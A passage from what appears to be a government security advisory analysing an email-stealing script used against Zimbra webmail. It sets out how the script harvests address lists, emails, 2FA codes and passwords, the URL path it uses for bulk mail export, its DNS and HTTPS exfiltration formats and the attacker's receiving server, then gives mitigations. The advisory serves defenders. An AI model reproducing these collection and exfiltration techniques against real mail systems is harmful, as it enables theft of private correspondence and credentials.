<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>SearchGalRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script attempts to collect the victim’s GAL through brute force by searching for each two-character combination from a character set of “abcdefghijklmnopqrstuvwxyz1234567890.-_”. These queries are conducted using 20 batches of SOAP requests with 77 “SearchGalRequest” SOAP commands in each batch except for the last request containing only 58.</p>
<p>During the <em>gather_environment</em> stage, the script attempts to determine which type of ZCS webmail client the victim is using. The script checks the user’s current URL to determine the client type being used, checking for certain indicators (shown in <a href="https://www.cisa.gov/#table2"><strong>Table 2</strong></a>) to determine the client type. The corresponding value is then used as the payload when exfiltrating the client type.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 2: ZCS webmail client types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Indicator </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Client Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Associated Value </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>?client=advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/h/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Standard </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>h </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/modern/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Modern </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>m </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>As part of collection, the script attempts to harvest any emails not marked as “junk” from the last 90 days from the victim’s account. Emails are collected daily by an HTTP GET request to the URL path, “/home/~/?fmt=tgz&amp;meta=0&amp;query=date:-{DAY_OFFSET}d AND (not in:junk)”. The <em>{DAY_OFFSET}</em> value would be between 0 and 89 representing how many days ago the email was sent or received. To prevent redundant collection and exfiltration of emails, a variable with a name based on the email date being queried, using a format of <em>zd_comp_YYYY-MM-DD</em>, and value of <em>true</em>, is saved to the <em>window.top.localStorage</em> property. This variable is saved regardless of whether the email is successfully exfiltrated.  </p>
<p>According to Mozilla documentation, if the user is not in a private browsing session, any data stored to localStorage does not typically expire. This means that if the user happens to execute the script again from the same computer, the script avoids attempting to re-exfiltrate previously captured emails. However, the script always attempts to pull any emails with a <em>{DAY_OFFSET} </em>of zero. In other words, the script always pulls emails sent or received the same day it is run. After email results are returned from the query for each day of email activity, those results are then passed to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section.</p>
<p>The script also provides LAUNDRY BEAR with telemetry on any errors that occur during the collection process. This is accomplished by executing any collection or exfiltration code through helper functions that contain error handling logic. If an error occurs, a payload containing information on the error itself, the context of the error happening, and the stage in which the error occurred is sent to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. For cases where the error occurs within a SOAP request, “:api” is concatenated to the stage value in the payload. If an error occurs during the batch SOAP requests that occur when collecting the GAL of the victim, the stage value will use a format of <em>gather_gal:{VAL}:api</em>. The <em>{VAL}</em> placeholder indicates which batch request, a number from 0 to 19, the error occurred in. Errors that occur during the password autocomplete interception process will use “gather_autocomplete_password:dom” for the stage value. Finally, if an error occurs when attempting to collect or exfiltrate a specific day’s emails, the stage will include which day the error occurred on, using the previously defined placeholder <em>{DAY_OFFSET},</em> with a format of <em>sendArchive:day-{DAY_OFFSET}</em>.</p>
<h3><em><strong>Exfiltration</strong></em><a class="ck-anchor"></a></h3>
<p>At the end of each stage in the collection process, the script attempts to exfiltrate acquired information to Flowerbed. The script primarily relies on two forms of data exfiltration: DNS [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank">T1048.003</a>] and HTTPS. Some information is exfiltrated over both the DNS and HTTPS channels.</p>
<p>Prior to exfiltration, a randomized 10- or 11-character alphanumeric string is generated as an identifier for the victim. This identifier is included in the URL of both the DNS- and HTTPS-based exfiltration.  </p>
<h4><strong>DNS exfiltration</strong></h4>
<p>DNS exfiltration occurs through DNS A record queries. To ensure data exfiltrated through DNS is not corrupted when traversing through non-actor-controlled DNS infrastructure, <em>Ulej </em>maintains compliance with RFC 1035, Domain Names - Implementation and Specification, specifically accounting for the case insensitivity and subdomain length requirements. Base32 encoding is used to create a case-insensitive payload. Once the payload is encoded, a period (“.”) is added every 60 characters to ensure each subdomain is under 63 characters long. The script then creates a new image object sourced from a URL with the scheme defined in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a>. Any traffic involving DNS exfiltration will have “d-“ prefixing the victim identifier, and the subdomain immediately following indicates the type of information being exfiltrated.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure6.png?itok=Tv8RT8o8" width="1024" height="49" alt="Figure 6: Structure for information exfiltrated by DNS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 6: Structure for information exfiltrated by DNS</strong></em></figcaption>
  </figure>
<p>When the script generates an image object, the browser tries to retrieve the complete domain of the URL specified as the source of the image. This triggers a DNS request sent to the actor-controlled server and processed by Flowerbed. <a href="https://www.cisa.gov/#table3"><strong>Table 3</strong></a> lists both the information exfiltrated via DNS and their corresponding data type identifiers in the DNS queries.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 3: DNS exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Data Type </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>e </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Client Type </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Zimbra Version </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment  </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>v </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>URL at Time of Exploitation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2FA Scratch Codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2fa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pw </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<h4><strong>HTTPS exfiltration</strong></h4>
<p>Any information exfiltrated via DNS is also exfiltrated through HTTPS, as well as additional data including email content, contacts, attachments, and error logging information. By using Let’s Encrypt certificates, this group can quickly deploy new infrastructure and leverage encrypted HTTPS communications with valid server certificates when exfiltrating information from the victim’s environment. The HTTPS exfiltration capability only uses two HTTP content types, defined in <a href="https://www.cisa.gov/#table4"><strong>Table 4</strong></a>. Traffic associated with HTTPS exfiltration will use the URL scheme shown in <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 4: HTTPS exfiltration types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>Content Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>URL Path </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/json </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/p </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/octet-stream </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/d </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%207.png?itok=CdTcyMdN" width="1024" height="50" alt="Figure 7: Structure for information exfiltrated by HTTPS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 7: Structure for information exfiltrated by HTTPS</strong></em></figcaption>
  </figure>
<p>Some of the data transmitted via HTTPS uses the standard JSON content type format. The script includes the information in a POST request to actor-controlled infrastructure.  </p>
<p><a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> provides a summary of the JSON-based exfiltration.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 5: HTTPS JSON exfiltration  </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>JSON Key(s) </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>email </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Client Type, Version, and Current URL </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>client, version, full_url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>app_password </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>autocomplete_password </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script transmits all HTTPS exfiltration not identified in <a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> using the Octet-Stream content type as binary data. The POST requests for this method include a filename in the “X-Filename” header. Traditionally, developers use headers prefixed with “X-” to denote custom headers that do not follow a defined standard. The purpose of including this header remains unclear since the Catcher capability ignores the provided filename when saving the data. <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> summarizes the data exfiltrated in this format.</p>
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<div class="TableContainer Ltr SCXW189907655 BCX8">
<div class="WACAltTextDescribedBy SCXW189907655 BCX8"><a class="ck-anchor"></a></div>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong> Table 6: HTTPS binary exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>X-Filename Header </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetScratchCodesRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Victim Organization’s Global Address List </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetry_{1-20}.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Last 90 Days of Victim’s Emails </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>sendArchives </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetryData_{0-89}.json </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>The script sends all exfiltrated data identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> to the Catcher service exactly as received from the SOAP request in a JSON payload, except for email exfiltration. For email exfiltration, the script sends it as a GZIP compressed archive [<a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank">T1560</a>]. Although most of the exfiltration consists of valid JSON, the script still attempts to exfiltrate all information identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> using the application/octet-stream content typing rather than application/json.</p>
<p>At the beginning and end of the collection and exfiltration activity, during the <em>sendStartPing</em> and <em>sendFinishPing </em>stages respectively, the script submits a POST request with a JSON payload to indicate that the script is starting or finishing execution. Throughout execution, the script also logs error events and send the logs using similar JSON payloads. The script sends the JSON in a POST request to the URL documented in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>, using a URL path of “/v/p” and with a “subtype” key that shows which type of action it logged (<em>start, finish, or error</em>).  </p>
<h4><strong>Catcher</strong></h4>
<p><em>Ulej </em>exfiltrates information to Flowerbed to be handled by a service named Catcher. Catcher is a containerized Python application, running in Docker as part of Flowerbed, which is detailed in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section. It receives exfiltrated data and temporarily stores it, enabling its eventual transfer to infrastructure designed for long-term, secure storage.</p>
<p>Catcher acts as an HTTP server over port 8000 and a DNS server on port 53. As described in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section, the Flowerbed project uses an additional Docker container running an Nginx reverse proxy to enable HTTPS support. This reverse proxy uses a certificate generated by Let’s Encrypt and forwards all traffic with an SNI containing “*.i.*” to port 8000 within the Catcher container.</p>
<p>The DNS service can accept A, AAAA, MX, TXT, and CAA queries. For any MX, AAAA, or CAA queries, the server will always provide an empty response. The system only supports TXT records as needed to process Automatic Certificate Management Environment (ACME) requests, which enable the assignment of Let’s Encrypt certificates. If the server receives an A query, Catcher will always respond with the public IP address of the Flowerbed server.  </p>
<p>However, if a query includes a domain formatted as shown in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>, the service saves a log file in JSON format to disk containing the following details of the DNS query:</p>
<ul>
<li>Time of query,</li>
<li>Source IP address for query,</li>
<li>Queried domain, and</li>
<li>Type of query.</li>
</ul>
<p>The HTTP server typically responds with OK, except in cases where the path is “pixel.gif” when the response contains a 1x1 gif image with a SHA-256 hash of ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629. Like the DNS service, the HTTP service will only log entries when the domain found in the host header of the request follows the expected formatting as seen in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>. As the HTTPS exfiltration uses non-standardized binary and JSON-formatted payloads when exfiltrating to Catcher, Catcher will check the content type of the request. If the content type is set to “application/json”, Catcher encodes the data in Base64 and includes it in the JSON log entry written to disk. If the content type is set to any other value, Catcher leaves the Base64 payload in the JSON log entry blank and saves the payload to a separate file with the same filename as the JSON log entry with a “.bin” file extension. An HTTPS exfiltration event causes Catcher to save a JSON formatted log file to disk containing the following information from the HTTP request:</p>
<ul>
<li>Time,</li>
<li>Source IP address,</li>
<li>Request method,</li>
<li>Host,</li>
<li>Path,</li>
<li>Query string,</li>
<li>Headers, and</li>
<li>Base64 payload.</li>
</ul>
<p>These JSON event log files and binary output files are then initially saved to the directory <em>/root/hits/tmp</em> and later moved to the <em>/root/hits/ready</em> directory once processed. This prevents incomplete files, which are still being uploaded to Catcher, from premature exfiltration from the server. Approximately every 60 seconds, a likely automated workflow establishes a Secure Shell (SSH) connection with the server hosting Flowerbed for a few seconds, almost certainly exfiltrating the data processed by Catcher to non-public-facing infrastructure. The command in <a href="https://www.cisa.gov/#figure8"><strong>Figure 8</strong></a> also executes hourly to remove all files last modified at least two days ago from the <em>/root/hits/ready</em> directory.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%208-Command%20used%20for%20automated%20directory%20cleanup.png?itok=IqvZvbLK" width="1024" height="92" alt="Figure 8: Command used for automated directory cleanup">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 8: Command used for automated directory cleanup</strong></em></figcaption>
  </figure>
<h2><strong>Response strategies</strong></h2>
<h3><em><strong>Mitigations</strong></em><a class="ck-anchor"></a></h3>
<p>In many cases, by the time an organization identifies a compromise related to this campaign, numerous sensitive and proprietary emails have already been exfiltrated. The significant risk posed by this cyber threat emphasizes the importance for organizations that use ZCS and other similar webmail solutions to take proactive steps to mitigate this risk.</p>
<p>All organizations that use the ZCS webmail service should <strong>immediately prioritize</strong> ensuring that their ZCS is not running a vulnerable version. A patch for <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> was released for both 10.1.13 and 10.0.18 versions of ZCS [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening">D3-AH</a>]. If immediate patching is not feasible, organizations should advise employees to use alternative mail clients to access email and avoid using the Classic ZCS webmail client until ZCS is updated to a non-vulnerable version [<a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank">d3f:Isolate</a>].</p>
<p>System administrators should closely monitor any Internet-connected ZCS or other email systems and the workstations that access those systems and promptly apply available software updates [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank">D3-AH</a>]. Administrators can maintain awareness of active vulnerability exploitation by referencing open source resources, including <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA’s Known Exploited Vulnerabilities Catalog</a> and <a href="https://www.ncsc.gov.uk/collection/vulnerability-management/guidance/responding-to-active-exploitation" target="_blank">NCSC-UK’s Responding to active exploitation of vulnerabilities</a> guidance.</p>
<p>Organizations should consider using a third-party authentication service that supports passkeys for authentication to mediate access to ZCS and other services that do not natively support passkeys. By doing so, organizations can work to eliminate the possibility of automated password collection from autocomplete or password reuse [<a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank">D3-CH</a>]. However, Application Passcodes may still be necessary and should be monitored closely.  </p>
<p>Organizations should implement network monitoring capabilities with collection and short-term retention of packet capture or NetFlow data and maintain log collection and storage [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MaintainLogCollectionStorage3Q">CPG 3.Q</a>]. This will allow organizations to monitor for and identify suspicious network activity [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#IdentifyAdverseEvents4B">CPG 4.B</a>], such as:</p>
<ul>
<li>Significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank">D3-NTA</a>];</li>
<li>Frequent DNS queries for a suspicious domain with seemingly random subdomains [<a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank">D3-DNSTA</a>];</li>
<li>A sudden spike of connections to a server associated with a recently established domain [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>]; and  </li>
<li>Connections to internal services, such as webmail, from VPN providers frequently leveraged by this group for nefarious activity, such as Mullvad VPN [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>].</li>
</ul>
<p>Additionally, for organizations that can inspect the content of outbound HTTPS connections via break-and-inspect infrastructure, security teams should identify traffic matching the characteristics described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory.</p>
<h3><em><strong>Indicators of compromise (IOCs)</strong></em><a class="ck-anchor"></a></h3>
<h4><strong>Flowerbed infrastructure</strong></h4>
